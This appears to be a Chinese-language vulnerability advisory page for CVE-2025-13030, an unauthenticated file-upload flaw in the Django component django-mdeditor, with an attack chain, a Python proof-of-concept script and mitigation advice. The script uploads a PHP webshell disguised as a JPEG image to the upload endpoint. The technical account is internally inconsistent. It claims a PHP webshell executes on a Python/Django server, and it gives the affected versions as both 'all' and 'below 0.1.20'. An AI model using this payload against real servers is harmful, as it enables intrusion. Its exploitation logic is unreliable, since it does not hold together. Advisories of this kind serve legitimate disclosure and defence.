CVE-2025-13030 CVSS 7.1 高危

CVE-2025-13030 django-mdeditor 任意代码执行漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13030

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

django-mdeditor

漏洞概述

django-mdeditor 所有版本存在高危安全漏洞。该漏洞源于图片上传端点未实施身份验证保护，且缺乏对文件名的严格过滤。攻击者可利用此缺陷，在无需认证的情况下上传恶意文件，进而实现任意代码执行，严重威胁服务器安全。

技术细节

该漏洞的核心在于 `django-mdeditor` 组件中的图片上传接口（通常位于 `/mdeditor/uploads/`）未实施有效的访问控制策略。代码逻辑中未检查用户是否已登录或具备上传权限，导致未授权的匿名用户可以直接访问该接口。此外，在处理上传文件时，系统未对文件名及文件类型进行严格的过滤和清洗。攻击者可以通过构造特制的 HTTP POST 请求，将包含恶意代码的脚本文件（如 webshell）伪装成图片上传至服务器 Web 目录。由于文件保存路径通常在 Web 根目录下，攻击者随后可以通过浏览器直接访问该恶意文件，触发服务器端解析执行，从而获取服务器权限，实现远程代码执行。这种利用方式结合了认证缺失和不安全的文件处理两个关键弱点。

攻击链分析

STEP 1

侦察

攻击者识别目标使用了 django-mdeditor 组件，并定位到图片上传接口。

STEP 2

漏洞利用

攻击者构造包含恶意文件（如PHP webshell）的POST请求，发送至无需认证的上传接口。

STEP 3

代码执行

服务器接收并保存恶意文件，攻击者通过浏览器访问该文件URL，触发服务器端解析，执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2025-13030
    Exploits Missing Authentication in django-mdeditor upload endpoint.
    """
    # The vulnerable endpoint typically maps to this URL
    upload_endpoint = f"{target_url}/mdeditor/uploads/"
    
    # Malicious file payload (e.g., a simple webshell)
    # The vulnerability allows arbitrary extension due to lack of sanitization
    payload = "<?php system($_GET['cmd']); ?>"
    
    # Prepare the file upload
    files = {
        'editormd-image-file': ('exploit.php', payload, 'image/jpeg')
    }
    
    try:
        # Send POST request without authentication
        response = requests.post(upload_endpoint, files=files, timeout=10)
        
        if response.status_code == 200:
            print("[+] Success! Server responded:")
            print(response.text)
            # If successful, the server might return the URL of the uploaded file
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8000"
    exploit(target)

影响范围

django-mdeditor < 0.1.20 (所有版本)

防御指南

临时缓解措施

建议立即升级 `django-mdeditor` 到最新版本。如果无法立即升级，应在应用网关层（如 Nginx 或 WAF）对 `/mdeditor/uploads/` 路径添加 IP 白名单或基础认证限制，并严格检查上传文件的类型和后缀名，防止恶意脚本上传。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表